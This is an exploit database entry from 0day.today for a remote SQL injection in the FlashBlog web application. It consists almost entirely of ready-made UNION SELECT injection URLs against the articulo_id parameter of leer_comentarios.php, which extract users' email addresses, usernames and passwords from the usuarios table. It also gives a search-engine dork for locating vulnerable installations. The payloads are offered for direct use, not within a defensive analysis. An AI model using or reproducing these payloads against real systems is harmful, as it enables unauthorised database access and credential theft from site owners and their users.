[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FlashBlog (articulo_id) Remote SQL Injection Vulnerability

Author
HER0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3077
Category
web applications
Date add
27-05-2008
Platform
unsorted
==========================================================
FlashBlog (articulo_id) Remote SQL Injection Vulnerability
==========================================================


###############################################################################
#
#   Name   : FlashBlog sql Inyeccion
#   Author : Her0
#   Dork   : "flashblog", allinurl:flashblog.html
#   Greetz : Komtec1,Freak,Knet,Boer,ka0x
#
###############################################################################

Proof of Concept :

    http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
   
   
The colums from host to host are diferent: all resolve =D
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*

   
###############################################################################



#  0day.today [2024-11-16]  #